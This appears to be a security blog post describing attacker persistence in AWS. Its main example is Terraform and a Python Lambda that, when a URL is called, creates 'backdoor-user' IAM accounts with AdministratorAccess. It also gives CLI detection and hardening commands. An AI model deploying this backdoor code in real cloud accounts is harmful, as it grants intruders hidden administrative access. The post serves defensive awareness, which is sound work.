Persistence as a Service with API Gateway and Lambda Function

Listen to this Post

Featured Image
Attackers are evolving their persistence techniques in AWS environments beyond traditional IAM user creation. Two emerging methods include:

  1. AWS Identity Center (AWS SSO) – Creating a new user, adding them to a group, and attaching a permission set.
  2. HTTP API Gateway + Lambda – Deploying an API Gateway and Lambda function that generates IAM users when a specific URL is invoked.

This shift suggests that conventional IAM user-based persistence is becoming less effective.

You Should Know:

Reproducing the API Gateway + Lambda Attack

To simulate this persistence technique, use the following Terraform configuration:

resource "aws_api_gateway_rest_api" "malicious_api" {
name = "PersistenceAPI"
description = "Malicious API for IAM user creation"
}

resource "aws_lambda_function" "user_creator" {
filename = "lambda_function.zip"
function_name = "CreateIAMUser"
role = aws_iam_role.lambda_exec.arn
handler = "index.handler"
runtime = "python3.8"
}

resource "aws_iam_role" "lambda_exec" {
name = "lambda_exec_role"
assume_role_policy = jsonencode({
Version = "2012-10-17"
Statement = [{
Action = "sts:AssumeRole"
Effect = "Allow"
Principal = {
Service = "lambda.amazonaws.com"
}
}]
})
}

resource "aws_iam_role_policy_attachment" "lambda_iam_full" {
role = aws_iam_role.lambda_exec.name
policy_arn = "arn:aws:iam::aws:policy/IAMFullAccess"
}

resource "aws_api_gateway_deployment" "deployment" {
rest_api_id = aws_api_gateway_rest_api.malicious_api.id
stage_name = "prod"
}

Lambda Function Code (Python)

import boto3

def handler(event, context):
iam = boto3.client('iam')
username = f"backdoor-user-{event['requestContext']['requestId']}"
iam.create_user(UserName=username)
iam.attach_user_policy(
UserName=username,
PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess'
)
return {
'statusCode': 200,
'body': f'User {username} created with admin access!'
}

Detection & Mitigation

AWS CLI Commands to Check for Suspicious API Gateways:

aws apigateway get-rest-apis 
aws lambda list-functions | grep "CreateIAMUser" 
aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=CreateUser 

Linux Command to Monitor AWS API Calls (CloudTrail Logs):

grep -i "CreateUser" /var/log/aws/cloudtrail.log 

Hardening Steps

1. Restrict Lambda IAM Permissions:

aws iam list-attached-role-policies --role-name lambda_exec_role 

2. Enable GuardDuty for Anomaly Detection:

aws guardduty create-detector --enable 

3. Use AWS Config Rules:

aws configservice put-config-rule --config-rule file://restrict-lambda-permissions.json 

What Undercode Say

Attackers are leveraging serverless architectures for stealthy persistence. Defenders must:
– Monitor unusual API Gateway deployments
– Restrict Lambda IAM roles to least privilege
– Audit AWS Identity Center (SSO) permission sets

Expected Output:

  • Detection of unauthorized API Gateway endpoints
  • Alerts on unexpected IAM user creation
  • Automated remediation via AWS Config

Prediction

Cloud attacks will increasingly exploit serverless components (Lambda, Step Functions) for persistence, requiring defenders to adopt behavioral detection over static IAM policies.

Relevant URLs:

IT/Security Reporter URL:

Reported By: Adan %C3%A1lvarez – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram